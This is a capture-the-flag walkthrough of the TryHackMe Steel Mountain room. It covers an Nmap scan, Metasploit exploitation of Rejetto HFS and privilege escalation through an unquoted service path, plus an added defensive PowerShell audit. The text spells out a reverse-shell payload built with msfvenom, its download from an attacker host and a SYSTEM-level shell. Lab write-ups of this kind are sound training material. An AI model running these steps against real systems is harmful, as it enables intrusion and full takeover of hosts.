Initial Reconnaissance
Scanning the Target with Nmap
nmap -Pn -A -p- -T4 10.112.172.119
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2026-04-18T14:24:30+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49199/tcp open msrpc Microsoft Windows RPC
49200/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:0d:ee:c2:15:03 (unknown)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-04-18T14:24:25
|_ start_date: 2026-04-18T13:59:08
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 0.75 ms 10.112.172.119
Web Enumeration
Port 80 (IIS):
Browsing to http://10.112.172.119 reveals a company website with only static images. Directory enumeration yields no promising results.

Port 8080 (Rejetto HFS):
Browsing to http://10.112.172.119:8080 presents the Rejetto HFS web interface — a lightweight file-sharing server.

Initial Foothold — Exploiting Rejetto HFS
The most reliable method for initial access is Metasploit's dedicated exploit module:
msfconsole
search HttpFileServer 2.3
The search shows that Rejetto HTTP File Server 2.3 is vulnerable to CVE-2014-6287, a remote code execution vulnerability that lets an unauthenticated attacker run arbitrary commands on the target system.
Configure and run the exploit:
use exploit/windows/http/rejetto_hfs_exec
show options
set RHOSTS 10.112.172.119
set RPORT 8080
set TARGETURI http://10.112.172.119:8080/
exploit
Capturing the User Flag
The user flag is in C:\Users\bill\Desktop\User.txt
Privilege Escalation
Enumeration with PowerUp
Download PowerUp.ps1 to my local machine and host it with a simple HTTP server:
python3 -m http.server 1234
Transfer it to the victim machine:
load powershell
powershell_shell
wget http://10.112.102.243:1234/PowerUp.ps1 -OutFile PowerUp.ps1

# Alternative: upload directly from the Meterpreter session
upload /root/PowerUp.ps1

# Alternative: drop to a command shell and call PowerShell from there
shell
powershell wget http://10.112.102.243:1234/PowerUp.ps1 -OutFile PowerUp.ps1

Import-Module .\PowerUp.ps1
Invoke-AllChecks
From the results, I noticed an unquoted service path. The Unquoted Service Path vulnerability occurs when a Windows service path contains spaces and is not enclosed in quotes. In such cases, Windows interprets each space-separated segment as a potential executable path.
Exploiting the Unquoted Service Path
1- Create a reverse shell payload with msfvenom on the local machine
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.112.102.243 LPORT=4443 -f exe-service -o shell.exe
python3 -m http.server 1234
2- Transfer the payload to the victim
# on the PowerShell session
wget http://10.112.102.243:1234/shell.exe -OutFile shell.exe
3- Move the shell to "C:\Program Files (x86)\IObit"
# back to the Meterpreter session
Ctrl+Z
# open a shell
shell
copy c:\Users\bill\Desktop\shell.exe "C:\Program Files (x86)\IObit\Advanced.exe"

4- Start a Netcat listener
nc -lvnp 4443
5- Stop the service and start it again
net stop AdvancedSystemCareService9
net start AdvancedSystemCareService9
6- Receive the reverse shell
The listener captures a connection with SYSTEM privileges.
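As an added defensive counterpart to the PowerUp finding and the steps above (example code, not from the original write-up or from PowerUp): the PowerShell audit below lists services with unquoted, space-containing paths on a host, shows which of the directories Windows probes before the real binary are writable by ordinary users, and quotes the ImagePath to remove the ambiguity. It assumes an elevated PowerShell session; the function names are my own.

```powershell
# Added defensive audit, not from the original write-up: finds services with an
# unquoted path containing spaces, shows the folders Windows probes first and whether
# ordinary users can write there, then quotes the path (keep -WhatIf until reviewed).
function Get-UnquotedServicePath {
    Get-CimInstance -ClassName Win32_Service | Where-Object {
        $p = $_.PathName
        $p -and -not $p.TrimStart().StartsWith('"') -and  # already quoted: fine
        $p -notmatch '^\s*[A-Za-z]:\\Windows\\' -and     # skip %SystemRoot% services
        ($p -split '\.exe', 2)[0] -match ' '             # a space before ".exe"
    } | Select-Object Name, StartName, PathName
}

# For "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe" Windows tries
# C:\Program.exe, C:\Program Files.exe and ...\IObit\Advanced.exe first: return those folders.
function Get-ProbedDirectory {
    param([Parameter(Mandatory)][string]$PathName)
    $exe = (($PathName -split '\.exe', 2)[0] + '.exe').Trim()
    $words = $exe -split ' '
    $(for ($i = 1; $i -lt $words.Count; $i++) {
        Split-Path -Parent ($words[0..($i - 1)] -join ' ')
    }) | Sort-Object -Unique
}

function Test-WritableByUsers {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    [bool]((Get-Acl -LiteralPath $Directory).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference -match 'Everyone|BUILTIN\\Users|Authenticated Users' -and
        $_.FileSystemRights -match 'Write|Modify|FullControl|CreateFiles'
    })
}

function Repair-UnquotedServicePath {
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$PathName)
    if ($PathName -notmatch '^(?<exe>.*?\.exe)(?<args>.*)$') { return }
    $fixed = '"' + $Matches.exe.Trim() + '"' + $Matches.args
    if ($PSCmdlet.ShouldProcess($Name, "set ImagePath to $fixed")) {
        Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$Name" -Name ImagePath -Value $fixed
    }
}

foreach ($svc in Get-UnquotedServicePath) {
    Write-Output ("[{0}] runs as {1}: {2}" -f $svc.Name, $svc.StartName, $svc.PathName)
    foreach ($dir in Get-ProbedDirectory -PathName $svc.PathName) {
        if (Test-WritableByUsers -Directory $dir) { Write-Output "    users can write to $dir" }
    }
    Repair-UnquotedServicePath -Name $svc.Name -PathName $svc.PathName -WhatIf  # drop -WhatIf to apply
}
```

A service is only exploitable in the way shown above when one of the probed folders is writable by a low-privileged account, so the ACL check is what separates a cosmetic finding from the IObit case on this box.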

Capturing the Root Flag
The root flag is on the Administrator's desktop, C:\Users\Administrator\Desktop:
powershell cat root.txt
Finally, thank you very much for reading to the end. I hope you found this article interesting.
Room Link : https://tryhackme.com/room/steelmountain
TryHackMe: https://tryhackme.com/p/AbdallahSamir
LinkedIn: Abdallah Samir | LinkedIn
X(Twitter): https://x.com/abdalla_jr7